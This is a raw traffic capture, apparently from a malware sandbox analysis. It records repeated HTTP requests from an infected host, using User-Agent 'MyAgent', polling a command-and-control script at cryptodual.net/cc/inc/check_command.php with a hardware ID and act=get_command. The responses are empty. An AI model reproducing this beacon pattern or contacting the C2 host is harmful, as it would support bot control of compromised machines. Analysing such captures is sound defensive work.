                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036ac010000d6d9f3886000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Lk%2BTbQC2aANHd3%2BifelcFtAqzEC9pnvEnvPuT%2BzS7X7p61smsr8trel%2FPZkApPh4ypGb1rDH%2FsBNqqXbmHWxobfi%2BMvQqWKONl%2BYS6JcoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3c00bbbd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:47.290327072 CET1320OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:47.378499985 CET1321INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036bfe10000d6d9378d0000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8AvwaxM95S%2BsQsWcg0jJv9XOikQtS2PjQw9Oi7c2g3zUGSZnVZlSqrEY6Ma%2BvyjnUAcNur0u6QTrzLcM3heiUBjhg2CmMVJK2UI1zJmoeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3dfc87cd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:47.380897999 CET1321OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:47.465764999 CET1322INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036c03e0000d6d90fac9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=33GZ0mYln6L4E5PiGLEx5GV66UA%2F0ycrAY%2B%2BhyVuROwdcd6zs4YUDgHrQAELrEqE54jwSR4RHQjsDS9CPFuyB12zLAekNf0VNvjA3Ml%2FdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3e069ebd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:47.467653990 CET1322OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:47.545320034 CET1323INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036c0910000d6d90d99a000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J00YQwq6ufqjPeH0VpCt8g%2ByMdrK8B4ystOe2eS6HAoERuhLuAzWEvJVS2a2bFXkmgvVlBMYKgVj2wUlKo9kTw0kZoprMkYj1bnTAZ6WAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3e0eb05d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:47.546960115 CET1323OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:47.629568100 CET1324INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036c0e10000d6d901831000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vXuqEFkTkGjlTNPefp11i2ea9pID5RZ36O%2FS%2FhDDo5cod9OabTc1NBfTRbxneCNr80536L2%2Fa%2BDGcSoFl5t0IV5n2hjLp05ZOf1GD8Ji5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3e16c05d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:52.639884949 CET1324OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:53.832005978 CET1325INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036d4c80000d6d92e076000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=z747ZsICptE%2BtvsKmbsDgd2OwDpixGkD7qkyGq8mDTjUw8ffI4%2F5wuJzudTg%2Fh92Wnj7hHJ71xhGW5igeZy%2B22wGudvWtNLMsIjpFuOyzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4013fd8d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:53.833966017 CET1325OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:53.915386915 CET1326INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036d96f0000d6d96ea46000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JTZlfSo42B14CugJTwyRGDo0YoWs67kGfMTj9RxMlEtngj%2FKAhKXgl23jHdjfF2YdNoxvA0C3pj900MV5pHPTgMKMqw0ZkBovrEuhXxa5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f408b85cd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:53.917467117 CET1326OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:53.999548912 CET1327INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036d9c30000d6d91c0f1000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XFn5T3on%2FGhf39LaYX7GWhowZQY%2BT1rGi2CYCJbF9J6RgqPdTuG1ZqQMuvn1PA%2FLIva0OU7OycX%2Fv5FPs0vCFa839hmD9iixk9rwjnNvhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f4093988d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:54.001650095 CET1327OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:54.084297895 CET1328INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036da1a0000d6d90a1ae000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fl6r9wAQcyYZuBTMOIs4sR1jyXjN5SkzUyrAliCCNqslktpo3Z0o4jRFiyERxwtTD9VDwmgT7ZRSdRQxjOeGVu%2F4hcwMRjaHBB2otVaeaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f409bab3d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:59.101597071 CET1328OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:59.187345028 CET1329INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036ee070000d6d9718e8000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=54WVtqxUjOCsGy1MbEmbTRLqUEu7aLUPg2iq%2Ffktc8hO%2B5U2EhKN1xX%2FztWXrdlfPwifBQIhASG9kW8AOHzitAlDSe3FUAhfznu4jm%2FhGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f429a9c6d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:59.190732956 CET1329OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:59.280184031 CET1330INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036ee5c0000d6d94e8d1000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hqrkRr8QoQvIkO46i8i%2FqX%2B0JFi9JYUV%2BaT5aXzP5u3sW1oGJA%2BwhqxRGDDdNxAKHz1i4USlKK5u0imA5BstbLtwADFZ8kOJyM3VUUvOQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f42a2ad9d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:59.283482075 CET1330OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:59.358824015 CET1331INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036eeb80000d6d923801000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MO4cZ9KUpO4z7%2F639znRA%2FAPOvgcl1dLdHrdlUdBFOYVqdpcT4RSwihU2aJjp0HwK1boK0%2F7bFKkm81TFNkBamkHckBqJ0bhRsgewdcp2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f42acc0fd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:59.363204002 CET1331OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:59.443300962 CET1332INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036ef080000d6d9f99bf000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=V3%2FZ5V%2FglIYem3%2BG00zX2IhOz6m%2BFjMXOUf9M5WxNpQ092FlEcqhCFS7wMeBm%2BNuLSvONokfNl6kM1vnUrmtaIn3jo0juI3LGF%2FtUJL%2BfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f42b4d40d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.455586910 CET1333OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.549865007 CET1334INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703702ed0000d6d91c037000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uYUJYHb9ppwWqKbonAv8NTdGrADrOfZn2rG%2Btvp5MEWwC1HVrjaOoWVgSDiAsFxcM2ceNZAR24qejWWWD2EADDzoFow0PXHrygsPRd1U2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44b1a87d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.552220106 CET1334OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.636149883 CET1336INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037034e0000d6d96e9fd000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0PuRxTvytwGAOZmZp26xeyes5ObKFhHiRD9xPN1GSskyJFDoGyz4NSOFOuMdT6oqApw58YzrcsRy9Gc%2B4fZsA7S0ax%2FawWfmHmEI6B5WrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44babc1d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.643834114 CET1336OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.722493887 CET1338INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703703ac0000d6d93b1de000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZpU3tJUedUYgW2oSiEBjnSX7fDq3rm531S0oczJcGLIsQNs5Xa0%2F4A6xDAvx38R3NeFJtMVs1I3ugWTZMHnag%2BMNN5NVDdJ4YHS5iHsPGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44c4d0ad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:04.724303007 CET1338OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:04.798818111 CET1340INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703703f90000d6d916a14000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=42yZNj5sPF8895oINslwAJkULzyf9x98wj8tjr1%2F57nFyFOjat42Vr307ODS1c8uBbBlbRQfefX4bwcd9bumMVYwIc4b2tpzFsZx1Te1CA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f44cce3dd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:09.805414915 CET1342OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:09.889626026 CET1343INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703717d20000d6d97187f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=My9OSjAjsCIjXTve3%2B06lo2%2FfbAqae5JFV%2FrbILIaxbxNt81IIfcaqvA3ekTbX5Ks%2BAfQG6Wy%2FJEdbhBbsbW9daCx0orbUpfbgkIytA%2FBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46c8c22d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:09.893394947 CET1343OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:09.980516911 CET1344INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077037182b0000d6d96b827000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=shCMkfbY0SqFq2QZao6nOYJFqfAE4epr%2FqkZ1z8P%2Fn0GS3t6eGuD3Wn3HwPqyE%2Byy0a8XboQGHoSNyF0ko6um5MknPAz4zLg8JyefAkQgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46d1d2dd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:09.984304905 CET1344OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:10.066766024 CET1346INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                x-powered-by: PHP/7.0.33
                                                                x-turbo-charged-by: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703718850000d6d941053000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0MpkGyOAnnP3nUss1pAwFACKGqdX%2FSk%2BfXiwcFAQTHVvIWu0yA9rXw6%2F%2BaVbk50VINzh%2BaA%2BLGlqQSLjLX5XsDnYWltkzIM%2F%2F0G20Cd65A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46dae7dd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:10.070358992 CET1346OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:10.152201891 CET1348INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703718dc0000d6d95831c000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OZvxNCyypu6s%2FfUI4OEpvojTJXVsX2ld1fkwrYq5UOZdT57YIpUEF2xtZ3NsV%2FEYvR%2Bzi1N1TcU6XJKMV0ouyr1kOiuci%2FhH9RWmBD1RKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f46e2839d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.166876078 CET1350OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:17:15.256918907 CET1351INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:17:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770372cc40000d6d91c001000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9vFbtvCMiJbAzniEqmGTEgobCes8fapsDhHiJDfwM8LmL7yfOxyYCxJ45L50LLC%2FXvde3y6Pnx70W2LI6t2qXB6sd41rigzGiq6zyNkVXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f48e0c3bd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:17:15.258449078 CET1351OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
